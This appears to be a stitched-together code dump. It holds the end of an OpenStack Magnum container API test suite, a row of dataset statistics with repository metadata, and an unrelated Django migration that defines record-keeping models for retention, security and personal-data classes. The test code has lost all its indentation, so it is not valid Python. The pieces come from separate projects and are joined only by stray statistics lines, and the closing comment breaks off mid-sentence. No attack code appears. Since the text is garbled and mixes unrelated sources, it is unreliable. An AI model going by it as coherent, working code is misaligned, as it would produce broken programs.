@patch('magnum.conductor.api.API.container_show')
@patch('magnum.objects.Container.list')
def test_get_all_containers_with_exception(self, mock_container_list,
mock_container_show):
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
mock_container_show.side_effect = Exception
response = self.app.get('/v1/containers')
mock_container_list.assert_called_once_with(mock.ANY,
1000, None, sort_dir='asc',
sort_key='id')
self.assertEqual(response.status_int, 200)
actual_containers = response.json['containers']
self.assertEqual(len(actual_containers), 1)
self.assertEqual(actual_containers[0].get('uuid'),
test_container['uuid'])
self.assertEqual(actual_containers[0].get('status'),
fields.ContainerStatus.UNKNOWN)
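# i.e. when the conductor backend raises while fetching live container status,
# the API degrades the reported status to ContainerStatus.UNKNOWN rather than
# failing the whole list request.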
@patch('magnum.conductor.api.API.container_show')
@patch('magnum.objects.Container.get_by_uuid')
def test_get_one_by_uuid(self, mock_container_get_by_uuid,
mock_container_show):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = test_container_obj
mock_container_show.return_value = test_container_obj
response = self.app.get('/v1/containers/%s' % test_container['uuid'])
mock_container_get_by_uuid.assert_called_once_with(
mock.ANY,
test_container['uuid'])
self.assertEqual(response.status_int, 200)
self.assertEqual(response.json['uuid'],
test_container['uuid'])
@patch('magnum.conductor.api.API.container_show')
@patch('magnum.objects.Container.get_by_name')
def test_get_one_by_name(self, mock_container_get_by_name,
mock_container_show):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_name.return_value = test_container_obj
mock_container_show.return_value = test_container_obj
response = self.app.get('/v1/containers/%s' % test_container['name'])
mock_container_get_by_name.assert_called_once_with(
mock.ANY,
test_container['name'])
self.assertEqual(response.status_int, 200)
self.assertEqual(response.json['uuid'],
test_container['uuid'])
@patch('magnum.objects.Container.get_by_uuid')
def test_patch_by_uuid(self, mock_container_get_by_uuid):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = test_container_obj
with patch.object(test_container_obj, 'save') as mock_save:
params = [{'path': '/name',
'value': 'new_name',
'op': 'replace'}]
container_uuid = test_container.get('uuid')
response = self.app.patch_json(
'/v1/containers/%s' % container_uuid,
params=params)
mock_save.assert_called_once_with()
self.assertEqual(response.status_int, 200)
self.assertEqual(test_container_obj.name, 'new_name')
@patch('magnum.objects.Container.get_by_name')
def test_patch_by_name(self, mock_container_get_by_name):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_name.return_value = test_container_obj
with patch.object(test_container_obj, 'save') as mock_save:
params = [{'path': '/name',
'value': 'new_name',
'op': 'replace'}]
container_name = test_container.get('name')
response = self.app.patch_json(
'/v1/containers/%s' % container_name,
params=params)
mock_save.assert_called_once_with()
self.assertEqual(response.status_int, 200)
self.assertEqual(test_container_obj.name, 'new_name')
def _action_test(self, container, action, ident_field):
test_container_obj = objects.Container(self.context, **container)
ident = container.get(ident_field)
get_by_ident_loc = 'magnum.objects.Container.get_by_%s' % ident_field
with patch(get_by_ident_loc) as mock_get_by_ident:
mock_get_by_ident.return_value = test_container_obj
response = self.app.put('/v1/containers/%s/%s' % (ident,
action))
self.assertEqual(response.status_int, 200)
# Only PUT should work, others like GET should fail
self.assertRaises(AppError, self.app.get,
('/v1/containers/%s/%s' %
(ident, action)))
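# Every action endpoint exercised below shares the shape
#   PUT /v1/containers/<uuid-or-name>/<action>
# e.g. (illustrative; the host and port are assumptions, not from this file):
#   curl -X PUT http://localhost:9511/v1/containers/my-container/start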
@patch('magnum.conductor.api.API.container_start')
def test_start_by_uuid(self, mock_container_start):
mock_container_start.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'start', 'uuid')
mock_container_start.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_start')
def test_start_by_name(self, mock_container_start):
mock_container_start.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'start', 'name')
mock_container_start.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_stop')
def test_stop_by_uuid(self, mock_container_stop):
mock_container_stop.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'stop', 'uuid')
mock_container_stop.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_stop')
def test_stop_by_name(self, mock_container_stop):
mock_container_stop.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'stop', 'name')
mock_container_stop.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_pause')
def test_pause_by_uuid(self, mock_container_pause):
mock_container_pause.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'pause', 'uuid')
mock_container_pause.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_pause')
def test_pause_by_name(self, mock_container_pause):
mock_container_pause.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'pause', 'name')
mock_container_pause.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_unpause')
def test_unpause_by_uuid(self, mock_container_unpause):
mock_container_unpause.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'unpause', 'uuid')
mock_container_unpause.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_unpause')
def test_unpause_by_name(self, mock_container_unpause):
mock_container_unpause.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'unpause', 'name')
mock_container_unpause.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_reboot')
def test_reboot_by_uuid(self, mock_container_reboot):
mock_container_reboot.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'reboot', 'uuid')
mock_container_reboot.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_reboot')
def test_reboot_by_name(self, mock_container_reboot):
mock_container_reboot.return_value = ""
test_container = utils.get_test_container()
self._action_test(test_container, 'reboot', 'name')
mock_container_reboot.assert_called_once_with(
test_container.get('uuid'))
@patch('magnum.conductor.api.API.container_logs')
@patch('magnum.objects.Container.get_by_uuid')
def test_get_logs_by_uuid(self, mock_get_by_uuid, mock_container_logs):
mock_container_logs.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.app.get('/v1/containers/%s/logs' % container_uuid)
self.assertEqual(response.status_int, 200)
mock_container_logs.assert_called_once_with(container_uuid)
@patch('magnum.conductor.api.API.container_logs')
@patch('magnum.objects.Container.get_by_name')
def test_get_logs_by_name(self, mock_get_by_name, mock_container_logs):
mock_container_logs.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_name.return_value = test_container_obj
container_name = test_container.get('name')
container_uuid = test_container.get('uuid')
response = self.app.get('/v1/containers/%s/logs' % container_name)
self.assertEqual(response.status_int, 200)
mock_container_logs.assert_called_once_with(container_uuid)
@patch('magnum.conductor.api.API.container_logs')
@patch('magnum.objects.Container.get_by_uuid')
def test_get_logs_put_fails(self, mock_get_by_uuid, mock_container_logs):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
self.assertRaises(AppError, self.app.put,
'/v1/containers/%s/logs' % container_uuid)
self.assertFalse(mock_container_logs.called)
@patch('magnum.conductor.api.API.container_exec')
@patch('magnum.objects.Container.get_by_uuid')
def test_execute_command_by_uuid(self, mock_get_by_uuid,
mock_container_exec):
mock_container_exec.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/%s' % (container_uuid, 'execute')
cmd = {'command': 'ls'}
response = self.app.put(url, cmd)
self.assertEqual(response.status_int, 200)
mock_container_exec.assert_called_once_with(container_uuid,
cmd['command'])
@patch('magnum.conductor.api.API.container_exec')
@patch('magnum.objects.Container.get_by_name')
def test_execute_command_by_name(self, mock_get_by_name,
mock_container_exec):
mock_container_exec.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_name.return_value = test_container_obj
container_name = test_container.get('name')
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/%s' % (container_name, 'execute')
cmd = {'command': 'ls'}
response = self.app.put(url, cmd)
self.assertEqual(response.status_int, 200)
mock_container_exec.assert_called_once_with(container_uuid,
cmd['command'])
@patch('magnum.conductor.api.API.container_delete')
@patch('magnum.objects.Container.get_by_uuid')
def test_delete_container_by_uuid(self, mock_get_by_uuid,
mock_container_delete):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
with patch.object(test_container_obj, 'destroy') as mock_destroy:
container_uuid = test_container.get('uuid')
response = self.app.delete('/v1/containers/%s' % container_uuid)
self.assertEqual(response.status_int, 204)
mock_container_delete.assert_called_once_with(container_uuid)
mock_destroy.assert_called_once_with()
@patch('magnum.conductor.api.API.container_delete')
@patch('magnum.objects.Container.get_by_name')
def test_delete_container_by_name(self, mock_get_by_name,
mock_container_delete):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_name.return_value = test_container_obj
with patch.object(test_container_obj, 'destroy') as mock_destroy:
container_name = test_container.get('name')
container_uuid = test_container.get('uuid')
response = self.app.delete('/v1/containers/%s' % container_name)
self.assertEqual(response.status_int, 204)
mock_container_delete.assert_called_once_with(container_uuid)
mock_destroy.assert_called_once_with()
class TestContainerEnforcement(api_base.FunctionalTest):
def _common_policy_check(self, rule, func, *arg, **kwarg):
self.policy.set_rules({rule: 'project:non_fake'})
exc = self.assertRaises(policy.PolicyNotAuthorized,
func, *arg, **kwarg)
self.assertTrue(exc.message.startswith(rule))
self.assertTrue(exc.message.endswith('disallowed by policy'))
def test_policy_disallow_get_all(self):
self._common_policy_check(
'container:get_all', self.get_json, '/containers')
def test_policy_disallow_get_one(self):
self._common_policy_check(
'container:get', self.get_json, '/containers/111-222-333')
def test_policy_disallow_detail(self):
self._common_policy_check(
'container:detail',
self.get_json,
'/containers/111-222-333/detail')
def test_policy_disallow_update(self):
test_container = utils.get_test_container()
container_uuid = test_container.get('uuid')
params = [{'path': '/name',
'value': 'new_name',
'op': 'replace'}]
self._common_policy_check(
'container:update', self.app.patch_json,
'/v1/containers/%s' % container_uuid, params)
def test_policy_disallow_create(self):
params = ('{"name": "' + 'i' * 256 + '", "image": "ubuntu",'
'"command": "env",'
'"bay_uuid": "fff114da-3bfa-4a0f-a123-c0dffad9718e"}')
self._common_policy_check(
'container:create', self.app.post, '/v1/containers', params)
def test_policy_disallow_delete(self):
self._common_policy_check(
'container:delete', self.app.delete,
'/v1/containers/%s' % comm_utils.generate_uuid())
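    # A minimal sketch of how _common_policy_check extends to another
    # endpoint. Hypothetical: 'container:logs' is an assumed rule name,
    # not one exercised elsewhere in this file.
    #
    # def test_policy_disallow_logs(self):
    #     self._common_policy_check(
    #         'container:logs', self.get_json,
    #         '/containers/%s/logs' % comm_utils.generate_uuid())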
| 46.953688 | 79 | 0.641375 | 3,143 | 27,374 | 5.264715 | 0.074133 | 0.10999 | 0.039886 | 0.045869 | 0.877077 | 0.839488 | 0.817913 | 0.801958 | 0.779477 | 0.751556 | 0 | 0.013323 | 0.251443 | 27,374 | 582 | 80 | 47.034364 | 0.794202 | 0.028823 | 0 | 0.72973 | 0 | 0 | 0.156716 | 0.09016 | 0 | 0 | 0 | 0 | 0.193347 | 1 | 0.087318 | false | 0 | 0.018711 | 0.002079 | 0.114345 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c060c3dbdb3ad597b7da6633cb2d7be265059c38 | 25,061 | py | Python | metarecord/migrations/0001_initial.py | kerkkoheiskanen/helerm | bdaf801a940d42325a1076b42bb0edef831fbac9 | ["MIT"] | 2 | 2017-04-21T15:36:23.000Z | 2020-12-04T09:32:39.000Z | metarecord/migrations/0001_initial.py | kerkkoheiskanen/helerm | bdaf801a940d42325a1076b42bb0edef831fbac9 | ["MIT"] | 168 | 2016-10-05T12:58:41.000Z | 2021-08-31T14:29:56.000Z | metarecord/migrations/0001_initial.py | kerkkoheiskanen/helerm | bdaf801a940d42325a1076b42bb0edef831fbac9 | ["MIT"] | 7 | 2016-10-13T12:51:36.000Z | 2021-01-21T13:05:04.000Z |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-13 20:37
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Action',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('name', models.CharField(max_length=256, verbose_name='name')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='action_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='action_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'actions',
'verbose_name': 'action',
},
),
migrations.CreateModel(
name='Function',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('function_id', models.CharField(max_length=16, verbose_name='function ID')),
('name', models.CharField(max_length=256, verbose_name='name')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='function_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='function_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='metarecord.Function', verbose_name='parent')),
],
options={
'verbose_name_plural': 'functions',
'verbose_name': 'function',
},
),
migrations.CreateModel(
name='PersonalData',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('value', models.CharField(max_length=256, verbose_name='value')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personaldata_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personaldata_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'personal data',
'verbose_name': 'personal data',
},
),
migrations.CreateModel(
name='Phase',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('name', models.CharField(max_length=256, verbose_name='name')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phase_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('function', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.Function', verbose_name='function')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phase_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
('personal_data', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.PersonalData', verbose_name='personal data')),
],
options={
'verbose_name_plural': 'phases',
'verbose_name': 'phase',
},
),
migrations.CreateModel(
name='ProtectionClass',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('value', models.CharField(max_length=256, verbose_name='value')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='protectionclass_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='protectionclass_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'protection classes',
'verbose_name': 'protection class',
},
),
migrations.CreateModel(
name='PublicityClass',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('value', models.CharField(max_length=256, verbose_name='value')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='publicityclass_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='publicityclass_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'publicity classes',
'verbose_name': 'publicity class',
},
),
migrations.CreateModel(
name='Record',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('type', models.CharField(max_length=64, verbose_name='type')),
('type_specifier', models.CharField(blank=True, max_length=256, verbose_name='type specifier')),
('action', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.Action', verbose_name='action')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='record_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='record_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
('personal_data', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.PersonalData', verbose_name='personal data')),
('protection_class', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.ProtectionClass', verbose_name='protection class')),
('publicity_class', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.PublicityClass', verbose_name='publicity class')),
],
options={
'verbose_name_plural': 'records',
'verbose_name': 'record',
},
),
migrations.CreateModel(
name='RetentionPeriod',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('value', models.IntegerField(verbose_name='value')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='retentionperiod_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='retentionperiod_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'retention periods',
'verbose_name': 'retention period',
},
),
migrations.CreateModel(
name='RetentionReason',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('value', models.CharField(max_length=256, verbose_name='value')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='retentionreason_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='retentionreason_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'retention reasons',
'verbose_name': 'retention reason',
},
),
migrations.CreateModel(
name='SecurityPeriod',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('value', models.IntegerField(verbose_name='value')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='securityperiod_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='securityperiod_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'security periods',
'verbose_name': 'security period',
},
),
migrations.CreateModel(
name='SecurityReason',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('value', models.CharField(max_length=256, verbose_name='value')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='securityreason_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='securityreason_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'security reasons',
                'verbose_name': 'security reason',
},
),
migrations.CreateModel(
name='SocialSecurityNumber',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of creation')),
('modified_at', models.DateTimeField(default=django.utils.timezone.now, editable=False, verbose_name='time of modification')),
('value', models.CharField(max_length=256, verbose_name='value')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='socialsecuritynumber_created', to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('modified_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='socialsecuritynumber_modified', to=settings.AUTH_USER_MODEL, verbose_name='modified by')),
],
options={
'verbose_name_plural': 'social security numbers',
'verbose_name': 'social security number',
},
),
migrations.AddField(
model_name='record',
name='retention_period',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.RetentionPeriod', verbose_name='retention period'),
),
migrations.AddField(
model_name='record',
name='retention_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.RetentionReason', verbose_name='retention reason'),
),
migrations.AddField(
model_name='record',
name='security_period',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.SecurityPeriod', verbose_name='security period'),
),
migrations.AddField(
model_name='record',
name='security_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.SecurityReason', verbose_name='security reason'),
),
migrations.AddField(
model_name='record',
name='social_security_number',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='records', to='metarecord.SocialSecurityNumber', verbose_name='social security number'),
),
migrations.AddField(
model_name='phase',
name='protection_class',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.ProtectionClass', verbose_name='protection class'),
),
migrations.AddField(
model_name='phase',
name='publicity_class',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.PublicityClass', verbose_name='publicity class'),
),
migrations.AddField(
model_name='phase',
name='retention_period',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.RetentionPeriod', verbose_name='retention period'),
),
migrations.AddField(
model_name='phase',
name='retention_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.RetentionReason', verbose_name='retention reason'),
),
migrations.AddField(
model_name='phase',
name='security_period',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.SecurityPeriod', verbose_name='security period'),
),
migrations.AddField(
model_name='phase',
name='security_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.SecurityReason', verbose_name='security reason'),
),
migrations.AddField(
model_name='phase',
name='social_security_number',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phases', to='metarecord.SocialSecurityNumber', verbose_name='social security number'),
),
migrations.AddField(
model_name='function',
name='personal_data',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='functions', to='metarecord.PersonalData', verbose_name='personal data'),
),
migrations.AddField(
model_name='function',
name='protection_class',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='functions', to='metarecord.ProtectionClass', verbose_name='protection class'),
),
migrations.AddField(
model_name='function',
name='publicity_class',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='functions', to='metarecord.PublicityClass', verbose_name='publicity class'),
),
migrations.AddField(
model_name='function',
name='retention_period',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='functions', to='metarecord.RetentionPeriod', verbose_name='retention period'),
),
migrations.AddField(
model_name='function',
name='retention_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='functions', to='metarecord.RetentionReason', verbose_name='retention reason'),
),
migrations.AddField(
model_name='function',
name='security_period',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='functions', to='metarecord.SecurityPeriod', verbose_name='security period'),
),
migrations.AddField(
model_name='function',
name='security_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='functions', to='metarecord.SecurityReason', verbose_name='security reason'),
),
migrations.AddField(
model_name='function',
name='social_security_number',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='functions', to='metarecord.SocialSecurityNumber', verbose_name='social security number'),
),
migrations.AddField(
model_name='action',
name='personal_data',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.PersonalData', verbose_name='personal data'),
),
migrations.AddField(
model_name='action',
name='phase',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.Phase', verbose_name='phase'),
),
migrations.AddField(
model_name='action',
name='protection_class',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.ProtectionClass', verbose_name='protection class'),
),
migrations.AddField(
model_name='action',
name='publicity_class',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.PublicityClass', verbose_name='publicity class'),
),
migrations.AddField(
model_name='action',
name='retention_period',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.RetentionPeriod', verbose_name='retention period'),
),
migrations.AddField(
model_name='action',
name='retention_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.RetentionReason', verbose_name='retention reason'),
),
migrations.AddField(
model_name='action',
name='security_period',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.SecurityPeriod', verbose_name='security period'),
),
migrations.AddField(
model_name='action',
name='security_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.SecurityReason', verbose_name='security reason'),
),
migrations.AddField(
model_name='action',
name='social_security_number',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.SocialSecurityNumber', verbose_name='social security number'),
),
]
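# Editor's note: every model above repeats the same audit fields (id,
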